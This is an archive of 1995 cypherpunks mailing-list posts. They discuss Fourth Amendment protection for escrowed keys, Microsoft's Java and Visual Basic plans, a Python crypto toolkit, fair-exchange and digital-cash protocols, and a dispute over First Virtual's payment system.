\-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <greg@ideath.goldenbear.com>
Date: Fri, 8 Dec 95 02:06:17 PST
To: tcmay@got.net
Subject: Re: Is there a lawyer in the house?
In-Reply-To: <30C8177F.47AF@goldenbear.com>
Message-ID: <199512081002.AA01851@ideath.goldenbear.com>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

Timothy C. May wrote:
> Sameer Parekh writes:
> >How is this different from
> >Bob has key. Cop want's Bob's key. Cop tells Bob "I want your key,
> >you need to give it to me. I don't have a warrant."
> >

> But I share Sameer's confusion. If cops show up at my door, they must, it
> seems to me, present proper warrants before they can _enter_ my premises,
> or _search_ my premises. Something given to me, whether a letter, a key, a
> photo, etc., is essentially *my property* and may not simply be taken away
> from without due process.

What's important here is the difference between things and information -
if the cops want to get *things* in your possession, they need a warrant
or consent or exigent circumstances or whatever. If they want to get 
*information* in your possession, they can subpoena you and make you talk 
(or show them the papers/records/whatever, modulo the Fifth amendment, modulo
immunity). Either way, the standard for due process (essentially nothing
for a subpoena - "more likely than not will lead to the discovery of fruits
of/evidence of a crime" for a warrant) is pretty minimal.

But, it's worse than that: as a matter of federal law, if I write "I, Greg
Broiles, killed Jimmy Hoffa and hid his body in one of the concrete columns
used to construct Giants Stadium", and give that piece of paper to you, and
cops search your house illegally and find that scrap of paper, the information
on the paper (if not the paper itself) can be used against me, even though
it was found in an illegal search. I wouldn't have "standing" (e.g., a legal
basis to contest the search) because federal law doesn't think I have a 
privacy interest in the stuff in your house.

I think that's the tricky bit behind the idea that there's no (personal)
expectation of privacy where a key is given to an escrow agent - the standing
requirement. State constitutions and statutes may provide a higher level of
protection - Oregon's constitution, for example, is interpreted to be more
generous re who's got standing to contest the legality of a search.

It occurs to me that the owner of the key might have a good argument that
they've got "third party standing", where they can essentially adopt the
position of the key's owner, because the key's owner is in a position such 
that they can't do a good job of representing their own interests, and the
third party will. (e.g., the doctor(?) in _Eisenstadt v. Baird_) The owner
of the key (at least if they're anonymous, and the key server is served with
a subpoena to "disclose the 'true name' of the owner of key 0x58ddf30d") may
wish to avoid revealing hirself. Hmm. That, of course, assumes that the
escrow holder feels like fighting the subpoena - perhaps that's something to
look for when you go escrow shopping.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMMgNC33YhjZY3fMNAQGPPQP+M7IFM/DgfEf6z5f8YUoBHo+aXPfTzwtf
xee1SPkJOxfH7dYaUIKs7JDAKxOGTaNdrlJjrMno7yHVFVHq6R7wRw8jOPUXhJ3C
VZ94LpTqNF6OPPoD+pr2MFG+SaFLl7JyS16Kbe9ilUE5cG6N2hToUibSjwyz3BKc
R95RR9TkRzs=
=4jN1
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Williams <dwwillia@cet.co.jp>
Date: Thu, 7 Dec 95 18:31:00 PST
To: Michaelh@cet.co.jp
Subject: Re: Micro$oft and Java
In-Reply-To: <199512080205.SAA02898@mail.eskimo.com>
Message-ID: <199512080231.CAA08012@parkplace.cet.co.jp>
MIME-Version: 1.0
Content-Type: text/plain



Another interesting post.  The list is really heavy.  I end up killing
most of the articles.  There are some real gems in there though.

>>>>> "Joel" == Joel McNamara <joelm@eskimo.com> writes:

    Joel> I was at the Microsoft presentation.  Crypto-relevant info:
    Joel> A patch will be published in the next few days to address
    Joel> the weak .PWL encryption.  I got a rather lame excuse about
    Joel> how the encryption was first implemented in 1991, and how it
    Joel> was sufficient then.  They will supposedly be changing the
    Joel> seed.

    Joel> I asked about what MS was doing in regard to future strong
    Joel> crypto.  Got an interesting response in that that "the
    Joel> government was going to let them implement 768 bit keys."  I
    Joel> later asked an MS person if these were RSA session keys or
    Joel> what.  He said yes, but I really don't think he knew what he
    Joel> was talking about based on some of his other comments.

    Joel> Visual Basic Script will be MS's response to JavaScript.
    Joel> The interesting thing here is a plan to use digital
    Joel> signatures on controls and scripts as a means of
    Joel> authentication.  The comment was made "you'd trust something
    Joel> signed by Lotus or some other big name, but you probably
    Joel> wouldn't be that trustful of a piece of shareware."  Hmmm...

    Joel> MS will be releasing a "safe" runtime version of Visual
    Joel> Basic that will supposedly prevent nasty virii and trojan
    Joel> horses from being implemented on Web pages.  IMHO, Perry's
    Joel> previous comments on the security of Java apply.

    Joel> Servers and some clients will support end-to-end encryption.
    Joel> No details...

    Joel> I didn't ask about GAK.  Bill said there was a white paper
    Joel> explaining Microsoft's position on encryption.  Maybe I'll
    Joel> test the search capabilities of the MS Web site later
    Joel> tonight.

    Joel> Overall, the presentation was interesting (but obviously
    Joel> lacking in technical details as the audience was mostly
    Joel> press).  MS is going to throw a lot of resources at this in
    Joel> order to maintain its industry dominance.

    Joel> Thought for the day.  Bill on the relevance of the briefing
    Joel> being held on Pearl Harbor day quoted Admiral Yamamoto after
    Joel> the 1941 attack, "we have awoken a sleeping giant."  Draw
    Joel> your own conclusions on that one...

    Joel> Joel

    Joel> --
David Wayne Williams		dwwillia@cet.co.jp
Software Engineer		http://www.cet.co.jp
Catena Enterprise Technologies	Linux, PGP, the Web: I love this Net!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Fri, 8 Dec 95 02:45:47 PST
To: cypherpunks@toad.com
Subject: Re: [NOISE] Re: FW: websurfer 4.6
Message-ID: <199512081045.CAA09807@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 7 Dec 1995, Ed Carp wrote:

> > On Thu, 7 Dec 1995, Rich Graves wrote:

> > 
> > Its interesting to note that all the people that were raving mad about
> > Java seem to be quiet now that MS is proposing to use VB. At least Java
> > was designed from the ground up with security in mind. But VB?

Java was not designed from the ground up with security in mind. Not by
a long shot.  It was an incubator project.  I know that.  And the Java
team knows that as well.  

And the ones who WERE raving about Java -- myself and others -- might
simply be attempting to speak to Sun through some non-public channels.
I, as an example, have tried to speak with my local Sun software
manager, Warren Strange, about Java and voice some of my concerns,
that way.

(Yep, that's his name ... "STRANGE" ... what else would you expect
with a company who's Canadian subsidiary is run by an "Everett", and
who has a Vice-President named "Tribble".)

Mind you ... I got absolutely _nowhere_ with Mr. Strange.  

I think he said that James Gosling was WAY too busy (as was he), and
that the last time he had checked Gosling had 800 email messages in
his mailbox, and that I should probably post my questions to
comp.lang.java, if I expected any answers.  

I really didn't have the heart to tell him, that I generally avoid
comp altogether, and stick primarily to the alt hierarchy --
especially alt.fan.alt.bigfoot.  Strange as that might seem.

Then again, I tried to have a bit of quiet time with Everett after
Monday's Christmas party, but he never had any time for me.  Too busy,
I guess.  He was running off to shoot snooker with some of the boys
from Oracle, I think.

I think that takes precedence over customer concerns.

But the party was a smash.  They even had a guy doing magic tricks.
Shame I didn't bring any business cards with me to a social occassion.

Guess, I just wasn't trained right.

But I _did_ get a nifty Java T-shirt and a snazzy pin.  So it was
worth it.  And the smoked salmon was an unexpected surprise in "It had
better be Beef" Alberta.  It was a very nice touch.

I also tried to talk to a Sales Representative (grin) about this --
about Java security.  Poor man.  I think he was almost tearful, when
he snapped at me, "Why don't you attack Microsoft instead??"

So, I guess I might just do that, here.

Does anyone besides me, see a sucker-punch in Microsoft's announced
support for Java??  Support for a competitor's product??  I certainly
do, especially from the way I saw the press presentations fly out over
the airwaves.  

The media coverage seemed not to convey the "right" touch of
sincerity.

It seems like Gates wants to support and promote a product as being
appropriate for something that it isn't suited for, and isn't designed
for, while having his very own own fall-back position with VB.

A sucker-punch.  Or at least that was my perception of it.  I don't
know about anyone else, here.

I wonder whether anyone from Sun smells a rat in Microsoft going this
route.  It seemed grossly out of character, for Microsoft.  Major
paradigm shifts such as this are truly unusual for large firms.
Especially Microsoft's IETF comments.

The frosting was just a little too sugary and thick, I think.

> And all this from a software company that took over 10 years to make 
> their "operating system" do preemptive *anything*.

It worries me when a company promotes another company's product
heavily, while only embracing it partially.  

Then again, what would I know.  I can get suckered into writing about
Microsoft's puffery by a single tearful Sun salesman.

Well, that, and some smoked salmon ... guess that rules me out for a
security clearance, huh??



Alice de 'nonymous ...               <an455120@anon.penet.fi>


                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.









> 
> But I guess I shouldn't complain.  After all, VB has made me a pretty 
> decent living for the past year or so...
> 

::
Request-Remailing-To: cypherpunks@toad.com
Subject: Re: [NOISE] Re: FW: websurfer 4.6





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Thu, 7 Dec 95 23:46:19 PST
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Python Cryptography Toolkit v1.0.0
In-Reply-To: <9512072158.AA15573@toad.com>
Message-ID: <199512080747.CAA06243@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Andrew Kuchling <andrewk@cst.ca> writes:
> I've just uploaded version 1.0.0 of the Python Cryptography Toolkit, a
> collection of cryptographic routines for the Python programming language.
> It's at ftp://ftp.cwi.nl/pub/pct/pycrypt100.tgz.  
[...]
> 	The Toolkit now contains various cryptographic algorithms such
> as DES, IDEA, MD5, etc.  
[...]
> 	Questions, comments, or suggestions are welcomed at the
> address below.

Sounds good. Here's some nitpicking:

(1) If you don't mind announcing that you've exported the software from
Canada to the Netherlands, why not just put it up for ftp at a Canadian 
site ? 

(2) Acronym overload: try to avoid calling your toolkit "PCT", since M$
already has some security protocol called PCT....

-Futplex <futplex@pseudonym.com>



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Thu, 7 Dec 95 23:59:31 PST
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: [NOISE] WE WANT SOME PUSSY PICTURES
In-Reply-To: <199512080727.SAA19878@mail.mel.aone.net.au>
Message-ID: <199512080758.CAA05849@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Nicholas Philp writes:
> WE WANT SOME PUSSY PICTURES

(Oops, soon it may be illegal for me to quote that)

http://callie.csci.unt.edu/~donr/cat-pics/index.html has good shots of Bonnie,
Brandy, and others. 

But why do you think this is relevant to c'punks ?

-Futplex <futplex@pseudonym.com>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Fri, 8 Dec 95 00:50:22 PST
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Is there a lawyer in the house?
In-Reply-To: <acecee610a021004a5f2@[205.199.118.202]>
Message-ID: <Pine.SUN.3.91.951208034633.18878C-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 7 Dec 1995, Timothy C. May wrote:

> At 2:27 AM 12/8/95, sameer wrote:
> >> > You mean if you give me your key the police can get it from me without a
> >> > warrant? What if I don't want to give it up, and you don't? How would the
> >> > police get it without a warrant?
> >>
> >> Yes.  Unless it could be shown there their was an expactation of privacy
> >> in the transfer, or that there was an understanding that you intended this
> >> to be a confidential matter.  Or in the alternative, that the
> >
> >        I do not understand.
> >
> >Alice has Alice gives Bob her key.  Cop wants Alice's key.  Cop tells
> >Bob "I want Alice's key, you need to give it to me. I don't have a
> >warrant."
> >
> >How is this different from
> >Bob has key. Cop want's Bob's key. Cop tells Bob "I want your key,
> >you need to give it to me. I don't have a warrant."
> >
> >
> >        sheesh, what a fucked up legal system.
>                         ^^^^^^^^^
> 
> EXON WARNING! This message has just exposed the author, the toad.com
> system, and all those who pass it on to fines of not less than $10,000!
> 
> But I share Sameer's confusion. If cops show up at my door, they must, it
> seems to me, present proper warrants before they can _enter_ my premises,
> or _search_ my premises. Something given to me, whether a letter, a key, a
> photo, etc., is essentially *my property* and may not simply be taken away
> from without due process.

There are MANY circumstances where a presence may be searched without a 
search warrant per se.  For example, a search of the premises incident to 
a lawful arrest.

> 
> I hope Black Unicorn is incorrect in his point.
>

Which point?  If you mean that the key is your property and not violable 
simply by virtue of that fact, then I have to tell you that you are over 
estimating the amount of protection you have.  You have to demonstrate a 
definate expectation of privacy in the key first.  Giving it to Alice 
tends to weaken your case in that regard.

Does the fact that you have given your key to Alice mean that the police 
can violate OTHER protections that the 4th amendment provides, of course 
not.  The police cannot just break down your door because you gave 
your key to Alice and it happens to be in your house.  Alice has 
nothing to do with the expectation of privacy you have in your 
house.  However, once they have their hands on the key, warrant or not, if 
you have not demonstrated an expectation of privacy in the item, you're not 
going to get Fourth amendment protections.

If I am talking in the wrong direction, present me with a direct question 
and I will try to confine my musings to it's precise context.

> --Tim
> 
> Views here are not the views of my Internet Service Provider or Government.
> ---------:---------:---------:---------:---------:---------:---------:----
> Timothy C. May              | Crypto Anarchy: encryption, digital money,
> tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
> Corralitos, CA              | knowledge, reputations, information markets,
> Higher Power: 2^756839      | black markets, collapse of governments.
> "National borders are just speed bumps on the information superhighway."
> 
> 
> 

---
My prefered and soon to be permanent e-mail address: unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Fri, 8 Dec 95 00:54:29 PST
To: cypherpunks@toad.com
Subject: Re: Is there a lawyer in the house?
In-Reply-To: <30C7C407.4117@netscape.com>
Message-ID: <Pine.SUN.3.91.951208035312.18878E-100000-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 7 Dec 1995, Jeff Weinstein wrote:

> Black Unicorn wrote:
> > 
> > On Thu, 7 Dec 1995, sameer wrote:
> > 
> > > > > You mean if you give me your key the police can get it from me without a
> > > > > warrant? What if I don't want to give it up, and you don't? How would the
> > > > > police get it without a warrant?
> > > >
> > > > Yes.  Unless it could be shown there their was an expactation of privacy
> > > > in the transfer, or that there was an understanding that you intended this
> > > > to be a confidential matter.  Or in the alternative, that the
> > >
> > >       I do not understand.
> > >
> > > Alice has Alice gives Bob her key.  Cop wants Alice's key.  Cop tells
> > > Bob "I want Alice's key, you need to give it to me. I don't have a
> > > warrant."
> > >
> > > How is this different from
> > > Bob has key. Cop want's Bob's key. Cop tells Bob "I want your key,
> > > you need to give it to me. I don't have a warrant."
> > 
> > The real concern is this:
> > 
> > Bob gives his key to alice.
> > 
> > The cops walk into alice's place and 'convince' alice to turn the key
> > over whithout a warant.  Perhaps alice is more susceptible to
> > persuasion because of some external reasons.  Alice does, Bob has no privacy
> > interest in the key, Bob can no longer argue that it is protected under
> > the 4th amendment.
> > 
> > Now let's get more sinister.
> > 
> > The cops mysteriously 'find' the key somewhere without a warrant.
> > Bob cannot argue that the key should be surpressed on the basis of the
> > 4th amendment because he gave it to Alice, and thus clearly it's not
> > information he was interested in protecting.  (This is assuming the cops
> > didn't violate other areas, or break into a house or something, or that
> > if they did, that the court will find out about it).
> 
>   How about if Bob had a contractual agreement with Alice to keep his
> key secret?

Then as a defense attorney, I would argue that Bob had an obvious 
expectation of privacy with Alice, and that the fact that he relayed this 
key to Alice only under those circumstances represents a definite 
expression of his intent to keep the key private, thus triggering 4th 
amendment protections.  My view is that this would be a very strong argument.

Note that this is an academic opinion, not a legal one as I am not being 
paid.

>
> 	--Jeff
> 
> -- 
> Jeff Weinstein - Electronic Munitions Specialist
> Netscape Communication Corporation
> jsw@netscape.com - http://home.netscape.com/people/jsw
> Any opinions expressed above are mine.

---
My prefered and soon to be permanent e-mail address: unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Fri, 8 Dec 95 00:58:15 PST
To: Cypherpunks Mailing List <cypherpunks@toad.com>
Subject: Re: Is there a lawyer in the house?
In-Reply-To: <199512080554.AAA05788@opine.cs.umass.edu>
Message-ID: <Pine.SUN.3.91.951208035603.18878F-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 8 Dec 1995, Futplex wrote:

> Black Unicorn writes:
> > Yes.  I have seen holdings which indicate that information given to an 
> > employer, where there was no obvious expection that it be kept 
> > confidential, estopped 4th amendment protections to its introduction when 
> > obtained without a warrant.
> [...and...]
> > Again, because of the nature of the relationship.  There is an 
> > expectation that a conversation with an attorney is one of the most 
> > private exchanges you can engage in.  As for rare exceptions, I'm not so 
> > sure I would term them rare.
> 
> What happens if I disclose a key to my employer's corporate law firm ?
> Does that clearly lie one way or the other, or would it likely hinge upon 
> the conditions under which I came to reveal the key ?

This becomes highly speculative.

My inclination is to say that it would hinge on the conditions under 
which you tendered the key to the legal department of your employer.  
This is a question of law, and would probably depend as much on the judge 
as on the circumstances.  Remember, 4th amendment rulings AGAINST the 
prosecution are very tough for a judge to make, because they usually mean 
excluding evidence key to the prosecution's case, and most often they 
arise in circumstances where the defendant looks guilty as sin.

> -Futplex <futplex@pseudonym.com>

---
My prefered and soon to be permanent e-mail address: unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The user formerly known as Leslie Todd Masco <cactus@hks.net>
Date: Fri, 8 Dec 95 01:14:03 PST
To: cypherpunks@toad.com
Subject: Re: Cyberia-L Archive [was Re: ERA_sur]
Message-ID: <199512080913.EAA25980@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <Pine.ULT.3.91.951206142028.4575V-100000@Networking.Stanford.EDU> you write:
>As somebody pointed out to me, Cyberia-L, like cypherpunks, is archived 
>on http://www.hks.net/ and the public news server nntp.hks.net.

!!!  As far as I know, Cyberia-L isn't accessable via http from us.  Please
let me know if it is...if so something's very misconfigured.

The nntp part is correct, though.  And a bunch of the lists might soon be
added to the http archives: cypherpunks is the test message base for it.

>Now send them some of the money you're going to make from the stock market.

That'd be way nice...  Small unmarked bills are preferred.
- -- 
Todd Masco     | "life without caution/ the only worth living / love for a man/
cactus@hks.net |  love for a woman/ love for the facts/ protectless" - A Rich
Cactus' Homepage
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMMgBryoZzwIn1bdtAQGB3gGA15WO7RLcosT3hrjEJN9d0H6Fk0fMu4lG
E/cw+h9YZcB6Nk0jiURfceCkBSz4+JSC
=TnoU
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ecafe Mixmaster Remailer <mixmaster@remail.ecafe.org>
Date: Thu, 7 Dec 95 20:32:18 PST
To: cypherpunks@toad.com
Subject: Oh Yeah?  ipsecure
Message-ID: <199512080435.EAA19138@pangaea.ang.ecafe.org>
MIME-Version: 1.0
Content-Type: text/plain



For Immediate Release

Contact:  National Semiconductor
          Lori Sinton (408) 721-2448
          lori@ipower.nsc.com
          http://www.ipsecure.com


CryptoSampler, from National Semiconductor, Demonstrates Ease of
     Building Secure Electronic Commerce and Communications
                          Applications

   Company's iPower(tm) Business Unit Launches Free CryptoSolver
                   to Inaugurate New Web Site


SANTA CLARA, Calif., November 27, 1995 --- National Semiconductor
Corporation today announced the availability of its CryptoSampler
package for applications developers interested in gaining a "hands on"
understanding of how cryptography solves modern business problems.
Developed by National's iPower Business Unit, the program consists of
three demonstration applications and the PersonaCard(tm) 100, a
hardware token for personal, portable data security.

     The package contains both the demonstration applications
including  "build-it- yourself" tools to integrate security easily
into electronic commerce and communications applications. Priced at
$129, the CryptoSampler package is available to the first 1,000 U. S.
respondents and can be ordered directly from National's iPower
Business Unit.

     In a related move, the company's iPower Business Unit launched
its own web site along with CryptoSolver, an interactive game that
invites participants to solve encrypted messages based on the concepts
of substitution ciphers and the alphabetic frequency table.
CryptoSolver, a technology-teaser game rates players' deciphering
skills and can be downloaded from iPower's new web site free.

"As networks become the lifeblood of corporations and the principal
means of commerce, securing electronic transactions and proprietary
information over public and private networks is absolutely critical,"
said Tom Rowley, marketing director for National's iPower Business
Unit. "Through this program, we hope to help broaden individual's
understanding of how modern security technology can solve real
problems on the Internet and in Electronic Commerce business
applications," Rowley explained.

CryptoSampler Package - Token Plus Three Applications in One
------------------------------------------------------------

     The CryptoSampler package consists of a PersonaCard 100 data
security token, a floppy disk containing all three demonstration
applications, a cryptography primer written by recognized cryptography
expert Bruce Schneier, and a questionnaire. Customers who choose to
complete and return the questionnaire, will receive a free copy, while
supplies last, of Bruce Schneier's newly-released book, Applied
Cryptography, second edition.

o PersonaScreen(tm) System Lockout Utility is a screen locker that
  prevents unauthorized entry into a personal computer by locking the
  keyboard and mouse. The PersonaCard Token, implemented in the PC
  Card (formerly PCMCIA) Type II format, locks and unlocks the desktop
  computer.

o PersonaSecure(tm) Word Utility enables users to sign, seal (encrypt,
  decrypt), and verify documents as well as e-mail messages from
  within Microsoft Word 6.0 for Windows. Installed automatically,
  PersonaSecure displays a toolbar that corresponds to the functions
  of National's PersonaCard data security token. The hardware token
  incorporates RSA's industry-standard digital signature and
  encryption formats which are now "token aware." In addition to
  protecting and validating Microsoft Word documents, users can
  encrypt and decrypt e-mail messages with others who have installed
  the PersonaSecure Word Utility.

o PersonaDLL Library for Visual BASIC 3.0 is a Dynamic Link Library
  (DLL) of routines that enables developers to quickly and easily
  develop their own applications incorporating high-level data
  security features. PersonaDLL includes a Visual BASIC application,
  Visual BASIC source code, and access to all of the features of the
  PersonaCard 100 token including digital signatures, RSA key
  generation, encryption, and verification.

     System requirements to run the CryptoSampler package are:
Microsoft Windows 3.X, Windows for Workgroups 3.X, and a PC Card slot
(version 2.1 or later). Microsoft Word 6.0 is required for the
PersonaSecure Word Utility.


Pricing and Availability
------------------------
     The CryptoSampler package is available with or without a PC Card
Reader. For those who plan to run CryptoSampler applications on a
desktop or portable personal computer already equipped with a PC Card
slot, the basic package is offered at a special price of $129
(including handling and shipping). A CryptoSampler package with PC
Card reader is available for $199. The total retail value of the basic
package and configuration with card reader is $300 and $500,
respectively.

     To order  the CryptoSampler package in either configuration, call
1-800-272-9959 Ext# 631 between the hours of 7 AM and 7 PM Central
Standard Time.  To play CryptoSolver and for more information about
the CryptoSampler program, see the iPower web site at
http://www.ipsecure.com  .

iPower Security Solutions
-------------------------
     Introduced a year ago, iPower technology provides the
highest-level of commercially available security in a personal,
portable hardware token. iPower solutions are already being
incorporated by OEMs, ISVs, and VARs into a variety of applications
and hardware platforms including e-mail and messaging, electronic
commerce, network security, and secure access to on-line services
including the Internet.

National Semiconductor Corporation provides technologies for moving
and shaping information. The company focuses on four key areas -
communications, consumer, industrial, and personal systems. National
Semiconductor is headquartered in Santa Clara, California, and has
22,300 employees worldwide.

                              -30-

Note to Editors: To receive a CryptoSampler package for review, call
or e-mail Lori Sinton, 408 721-2448 or sampler@ipower.nsc.com

iPower and PersonaCard are trademarks of National Semiconductor
Corporation. All other trademarks are held by their respective
companies.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Fri, 8 Dec 95 01:46:38 PST
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: digital receipts and cash
In-Reply-To: <199512010408.UAA04333@quito.CS.Berkeley.EDU>
Message-ID: <199512080947.EAA06459@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


David Wagner writes:
> (Later, if the vendor reneges on the transaction, you'd have the digital
> receipt to prove that you paid & the vendor is cheating you.)
> 
> This seems like it would be a really useful feature.  Does anyone know
> if there are any *practical* protocols to do this?
[...]
> ObCrypto relevance: I've looked through _Applied Cryptography_, but the
> protocols listed there aren't practical -- they require something like
> 100 rounds of interaction!  Can this be improved?

The Even/Goldreich/Lempel protocol (ACv1, pp.101-103) requires O(k) fairly
expensive operations (i.e. key generations, encryptions, network 
transmissions) to guarantee honesty with probability p = 2^k. k = 100 is
suggested. Perhaps this protocol would be useful in many applications with
k << 100. It might be argued that k need only be about 
O(lg(value(transaction))). I think k = 10 or 20 would be suitable for many
relatively low-value digital cash transactions. Waiting a bit longer to
arrange the purchase of a car over the net sounds tolerable to me.

I suppose you could precompute heaps of keys for use in unspecified future
transactions, which helps a bit.

It's hard to imagine circumventing the basic need for incremental increases
in trust, with a nontrivial cryptographic operation at each end in each
round. But hey, I certainly don't expect to prove that anytime soon.... :) 

-Futplex <futplex@pseudonym.com>



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Fri, 8 Dec 95 02:44:42 PST
To: Nathaniel Borenstein <cypherpunks@toad.com
Subject: Re: Geodesic Payment Systems?
Message-ID: <2.2b8.32.19951208104734.00878b10@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 04:40 PM 12/7/95 -0500, Nathaniel Borenstein wrote:

>None at all, if you can find an underwriter who is comfortable with the
>fact that his investigative options will be limited in the case of
>suspiciously large or suspiciously frequent "cash out" events from a
>given customer.  Apparently Mark Twain Bank finds that risk acceptable. 
>I'm sure the larger banks will be watching quite closely.

I seem to remember from my favorite Law School class -- Commercial Paper --
that banks weren't liable if they paid out an account from cleared funds
under the terms of the account.  A bank is responsible for payments made on
a forged drawer's signature and anyone who accepts an instrument from a
forged endorser eats the loss.  But online clearing with digital signatures
makes it hard to forge the drawer's signature and digital cash doesn't have
the sort of endorsement system used on paper checks.  

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Fri, 8 Dec 95 03:45:23 PST
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Still more on the Digicash protocol
In-Reply-To: <199512071610.KAA16536@admin.starnet.net>
Message-ID: <199512081146.GAA06511@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Lucky (wearing his MTB hat) writes:
> So when will the user pay with a wildcard coin? To make a payment to a party
> that is (pseudo-) anonymous to the payor. That is, if the payor sends the
> payment via anonymous remailer, in which case the messages should be
> encrypted anyway.
> 
> [Why a remailed message should be encrypted is left as an exercise to the
> reader.]

I don't think that's axiomatic. 

To be clear, I'm _not_ talking about encryption using the public keys of the 
remailers in a chain. I certainly do not wish to dispute the advantages of 
using those. But such encryption is just a form of link encryption. It
doesn't prevent the final remailer (or anyone between the last remailer and 
the recipient) from altering the plaintext payor_id.

It seems to me that end-to-end encryption is not significantly more important
for remailed messages. Really, there's less information in the message when
it emerges from the last remailer, so there's less to protect than in the
ordinary case. Furthermore, it may not even be feasible, since I may not have 
a public key I can associate with my correspondent.

-Futplex <futplex@pseudonym.com>



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathaniel Borenstein <nsb@nsb.fv.com>
Date: Fri, 8 Dec 95 03:52:43 PST
To: cman@communities.com (Douglas Barnes)
Subject: Re: More FUD from First Virtual
In-Reply-To: <v02120d01aced1ca6830e@[199.2.22.120]>
Message-ID: <okm2OdaMc50eFDgIEJ@nsb.fv.com>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from mail.limbo: 7-Dec-95 More FUD from First Virtual Douglas
Barnes@communiti (1157*)

> It is important to remember that Nat Borenstein is a principal

It's Nathaniel, please.

> in a company that very much does not want to see anonymous e-cash
succeed. 

This is utter nonsense.  If you check the cypherpunks archive, you'll
find that a year ago I was talking about how to make Digicash succeed as
a floating currency.  Several people within FV thought it was
inappropriate for me to be giving free advice to "competing" payment
systems, but I think there's room for plenty of payment systems on the
net, and that nobody is going to monopolize the market with a single
payment scheme.  If I didn't want anonymous cash to succeed, why would I
waste my time explaining alternate models (not previously under
discussion!) about how to make it succeed?

I *am* skeptical about the extent to which anonymous cash *can* succeed,
but in point of fact I'd like to help.  I think society will be better
off if one of the payment options is truly anonymous.  I think that
level of privacy will inevitably carry a high surcharge, however, for
reasons that I keep pointing out and you keep ignoring.

> Their extremely backwards technology cannot compete in
> the long term with cryptography-based methods, and therefore they
> are compelled to run around the country and on the Internet, bad-
> mouthing cryptography and anonymity at every turn, while pointing
> to some charity work for Phil Z. as a fig leaf to cover their
> actions in this regard (sort of like Exxon building an artificial
> reef and claiming to be friends of the environment.)

Sticks and stones may hurt my bones, but I do feel an obligation to
provide an explanation for anyone who hasn't been following Mr. Barnes'
rantings over the last year.  

For reasons I really don't understand, Mr. Barnes seems to have a
personal vendetta against First Virtual. That's fine, it's his right. 
But there are some facts he prefers to ignore, in favor of spreading
misinformation and slurs:

1.  Our "backwards technology" includes what may be the world's most
sophisticated internet firewalls and email robots.  We were the first
people to connect the Internet to the financial networks (including,
indirectly, the Federal Reserve) and have operated the system for over a
year, with several breakin attempts every week, and nobody has even come
close to breaking in.  Internally, everyone in our company uses pgp
extremely heavily, and I suspect that if you go to more
"cryptography-oriented" companies you will NOT find that their CEO and
marketing people know how to use PGP.  They are, for the most part, all
talk and no action when it comes to cryptography.  We all use it every
day, even the non-technical people.  This has given us a lot of insights
into the strengths and weaknesses of cryptography in the hands of
non-technical people.

[FYI, newcomers to this discussion, it's sentences like the last one --
which imply that, horror of horrors, there are actually *weaknesses*
